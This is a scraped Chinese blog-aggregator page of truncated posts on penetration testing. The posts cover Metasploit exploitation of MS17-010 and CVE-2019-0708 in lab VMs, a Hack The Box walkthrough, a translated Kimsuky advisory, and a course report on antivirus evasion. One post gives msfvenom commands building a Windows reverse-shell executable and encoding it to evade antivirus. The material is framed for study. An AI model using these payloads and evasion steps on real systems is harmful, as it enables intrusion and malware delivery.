metasploit

网络安全工程师演示:原来***是这样获取你的计算机管理员权限的!【***】

ぃ、小莉子 提交于 2021-02-08 05:29:52
课前声明: 1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali 与编程,学习更多网络***干货! 3、Kali 与编程每天准时更新,敬请学习和关注! 正文部分 一、背景介绍 Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用***控制受害者主机呢?接下来让我们一起学习! 二、资源装备 1.安装好 Win7的虚拟机一台 2.整装待发的小白一个。 3.安装好的Kali Linux虚拟机一台。 三、战略安排 3.1 利用Metasploit(msf)***框架对目标主机进行***,如下图所示。 步骤1:启动Metasploit(msf)***框架,如下图所示。 命令:msfconsole 步骤2:Metasploit(msf)***框架启动成功,如下图所示。 步骤3:检索漏洞,如下图所示。 命令:search 漏洞编号 例子:search ms17-010 步骤4:检索到有关漏洞的利用模块如下图所示。 步骤5:选择对应的漏洞利用模块并使用,如下图所示。 命令:use 漏洞利用模块名称 例子:use exploit

2018-2019-2 网络对抗技术 20165320 Exp3 免杀原理与实践

谁说胖子不能爱 提交于 2021-02-05 03:04:28
<center> 2018-2019-2 网络对抗技术 20165320 Exp3 免杀原理与实践 </center> 一、实验内容 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分) 1.2 通过组合应用各种技术实现恶意代码免杀(0.5分) 1.3 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(加分0.5) 二、报告内容 <center>2.1 基础问题问答 杀软是如何检测出恶意代码的? 答:主要包括三个方面: 基于特征码的检测:特征码就是一段或多端数据,如果一个可执行文件(或者运行的库、脚本等)包含这样的数据就会被认为是恶意代码 启发式恶意软件检测:如果一个软件在干通是常恶意软件干的事,看起来就像个恶意软件,那么就把它当作一个恶意软件吧(偷笑.jpg) 基于行为的恶意软件检测:属于启发式的一种,加入了行为监控 免杀是做什么? 答:通过修改恶意软件或恶意代码让其能够不被杀毒软件检测出来。 免杀的基本方法有哪些? 答:总体技术有如下: 改变特征码:如果有exe文件,就对它进行加壳(压缩、加密)、如果有shellcode,就用encode进行编码,基于playload重新编译生成可执行文件、如果有源代码

【漏洞复现】CVE-2019-0708漏洞复现

自作多情 提交于 2021-02-04 10:48:36
0x00漏洞描述 Windows 再次被曝出一个破坏力巨大的高危远程漏洞 CVE-2019-0708 。 CVE-2019-0708 是 RDP 协议的安全漏洞,具有蠕虫功能,因此 危害很大。攻击者一旦成功利用该漏洞,便可以在目标系统上执行任意代码,包括获取敏感信息、执行远程代码、发起拒绝服务攻击等等攻击行为。 0x01受影响的操作系统 · Windows 2003 · Windows XP · Windows 7 · Windows Server 2008 ·Windows Server 2008 R2 0x02复现环境 攻击机: Linux kali 2020.2 ( IP : 192.168.61.158 ) 靶机: Windows 7 X64 ( IP : 192.168.61.139 ) 0x03复现过程 一、进入Metasploit 框架 1、在kali终端输入msfconsole进入Metasploit,输入 search CVE- 2019 - 0708 搜索CVE-2019-0708可用模块 auxiliary/scanner/rdp/cve_2019_0708_bluekeep模块为扫描模块; exploit/windows/rdp/cve_2019_0708_bluekeep_rce模块为攻击模块; 二、扫描目标主机是否存在漏洞 1、加载扫描模块; use

HTB-靶机-Frolic

随声附和 提交于 2021-02-02 12:20:12
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.111 本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描 执行命令 autorecon 10.10.10.111 -o ./Frolic-autorecon 爆破到目录admin访问下 没发现啥东西,查看下网页源代码 看到一个js文件 发现有个success.html的路径 访问结果如上,经过谷歌搜索确认跟密码学有关,解密地址:https://www.splitbrain.org/_static/ook/ 得到上面的一个路径,再访问一把 得到上面的base64编码信息,将其解码重定向到一个文件中 sudo echo ' UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwABBAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbsK1i6f+BQyOES4baHpOrQu+J4XxPATolb

攻击载荷免杀技术

孤街醉人 提交于 2021-01-31 09:19:41
大多数杀毒软件使用特征码来识别恶意代码。特征码在杀毒引擎中,对磁盘和进程进行扫描匹配。 为了避开杀毒软件,可以针对特征码创建一个独一无二的攻击载荷,它不与杀毒软件的任何特征码匹配。 当直接渗透时,metasploit的攻击载荷可以只在内存中运行,不将任何数据写入到硬盘上,我们发起攻击并上传攻击载荷后,大多数杀毒软件都无法检测出来。 1.使用MSF攻击载荷生成器创建可独立运行的木马 两条命令搞定 msfvenom -p windows/shell_reverse_tcp --payload-options msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.140(自己的IP)LPORT=31337(自己的端口)-f -exe -o payload1.exe 一个windows PE文件(便携可执行文件) 木马 2.躲避杀毒软件的检测 最佳方法之一,使用MSF编码器 以百度杀毒为例子。在目标上实际部署攻击载荷前,需要弄清目标的反病毒方案,确保木马顺利运行 使用MSF编码器,对木马文件进行重新编码。它能改变可执行文件中的代码形状。和电子邮件附件base64编码类似。 当这个文件运行后,MSF编码器会将原始程序解码到内存中并执行。 msfvenom -l encoders 选择不同环境(比如x86,linux,PPC等)的编码格式

初识渗透测试

时光怂恿深爱的人放手 提交于 2021-01-27 02:39:00
前 言 熟悉军事的朋友都应该了解,各个国家的军队每年都会组织一些军事演习来检验部 队的攻防战术和作战能力,在美国,一般会将美军称为蓝军,将假想敌称为红军,这种军事演戏的方式,也在上个世纪90年代引入美军的网络安全和信息基础设施的实际攻防测试过程。由 一群接受过 职业培训的安全专家作为红方,对防御方蓝方进行安全攻击,以实战的方式来检验目标系统的防御体系和应急响应计划的有效性,这种通过实际的攻击方式进行安全测试和评估的方法就是安全渗透测试。 在20世纪90年代后期,逐步开始从军队和情报部门拓展到安全界,一些对安全需求很高的企业开始采用这种方式来对他们的网络和系统进行测试 。 一 、渗透测试概述 所谓渗透测试是借助各种漏洞扫描工具,通过模拟黑客的攻击方 法来对网络安全进行评估。 渗透测试类型 选择的渗透测试类型取决于公司和组织的用途和范围 - 他们是否想要模拟员工,网络管理员或外部来源的攻击。通常,有三种不同类型的渗透测试: 黑盒测试 : 是指对基础设施不知情的情况下进行测试。黑盒测试比较费时费力,同时要求渗透测试者具备较高的技术能力; 白盒测试: 是指在完全了解结构的情况下进行的测试。白盒测试能比黑盒测试消除更多的目标的安全漏洞,给客户带来更大的价值。白盒测试最大的问题在于无法有效的测试客户的应急响应程序,无法判断客户的安全防护计划对检测特定的统计的效率; 灰盒测试 :

20164301 Exp5 MSF基础应用

爷,独闯天下 提交于 2021-01-13 09:35:54
Exp5 MSF基础应用 1. 实践内容 1.1一个主动攻击实践,如ms08_067,smb_delivery(唯一) 1.2 一个针对浏览器的攻击,如ms10_046; 1.3 一个针对客户端的攻击,如Adobe; 1.4 成功应用任何一个辅助模块。gather/browser_info(唯一) 2. 报告内容 一个主动攻击实践,如ms08_067,smb_delivery (1)ms08_067 攻击机:Linux 靶机:Windows XP sp3 1.进入到/usr/share/metasploit-framework/modules/exploits/windows/smb路径下,查看可利用的漏洞 Linux的IP地址192.168.132.130 靶机IP地址192.168.132.131 2. msf > use exploit/windows/smb/ms08_067_netapi//使用ms08_067漏洞 msf exploit(ms08_067_netapi) > show payloads//显示回连攻击载荷 msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp msf exploit(ms08_067_netapi) > set LHOST 192.168.132.130

CVE-2019-0708复现之旅

人盡茶涼 提交于 2021-01-04 04:50:32
CVE-2019-0708 0x00 前言: CVE-2019-0708漏洞已经出来三四个月了对应的poc也出现了很久 ,exp 还是没动静前段时间出了个蓝屏伪exp 不过肯定那些大厂手里早已经了有了真正的exp 今天突然Github上有人上传了exp 在这里得到消息后就紧跟着复现了一下 注意!!!蓝屏概率很大 请不要用在随意测试 漏洞概要 漏洞名称 Microsoft Windows Remote Desktop Services远程代码执行漏洞 威胁类型 远程代码执行 威胁等级 严重 漏洞ID CVE-2019-0708 利用场景 未经身份验证的攻击者可以通过发送特殊构造的数据包触发漏洞,可能导致远程无需用户验证控制系统。 受影响系统及应用版本 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) Windows Server 2008 for Itanium-Based Systems

朝鲜黑客组织 Kimsuky 的持续性网络攻击

ε祈祈猫儿з 提交于 2020-12-29 17:04:26
作者:知道创宇404实验室翻译组 原文链接: https://us-cert.cisa.gov/ncas/alerts/aa20-301a 一、概要 网络安全报告书由网络安全基础设施安全局(CISA)、联邦调查局(FBI)和美国网络司令部国家宣教部队(CNMF)联合撰写,主要描述了针对朝鲜高级黑客组织 Kimsuky 网络攻击所使用的战术、技术和程序(TTP)。美国政府将该网络攻击称为HIDDEN COBRA,有关HIDDEN COBRA的更多信息,请访问 https://www.us-cert.cisa.gov/northkorea 。 本文描述了截止2020年7月已知的Kimsuky黑客网络攻击事件,旨在保护相关组织免受该黑客影响。 单击此处 以获取PDF版本。 二、主要发现 Kimsuky黑客组织可能自2012年开始运营。 Kimsuky很可能是朝鲜政府支持的全球情报搜集任务。 Kimsuky运用常见的策略窃取数据。[ 1 ],[ 2 ] Kimsuky最可能使用网络钓鱼获取初始访问权限。[ 3 ] Kimsuky的情报收集针对韩国、日本和美国。 Kimsuky重点关注朝鲜半岛、核政策、外交政策及国家安全问题的相关信息。 Kimsuky特别关注对象: 各领域专家、智囊团、韩国政府机关;[ 4 ],[ 5 ],[ 6 ],[ 7 ],[ 8 ] CISA

23.通过MS17_010来学习msf对渗透的利用

戏子无情 提交于 2020-12-26 02:06:15
Metersploit 集成了渗透阶段的全部利用,从漏洞探测,到漏洞利用,最后到后渗透阶段。本次博客主要抛砖引玉,通过对MS17_010漏洞的复现,来学习Metasploit。 漏洞环境: 靶机:windows 7 (192.168.0.135) 攻击机:kali 2018 (192.168.0.133) 开始之前先来熟悉 Metaspolit 基本术语: Auxiliaries(辅助模块),Exploit(漏洞利用模块),Payload(攻击载荷模块),Post(后期渗透模块),Encoders(编码工具模块) 1.加载smb扫描模块 msf > search auxiliary/scanner/smb 发现可利用的smb_ms17_010模块 2.加载漏洞扫描模块对ip段进行漏洞扫描: msf > use auxiliary/scanner/smb/smb_ms17_010 msf > set rhosts 192.168.0.100-150 msf > set threads 10 msf > run 发现 192.168.0.135 这台主机可能存在MS17_010漏洞 3.利用nmap对漏洞主机进行探测: msf > nmap -T4 -A 192.168.0.135 发现敏感端口 139,445 开启 4.搜索MS17_010可利用漏洞模块 msf > search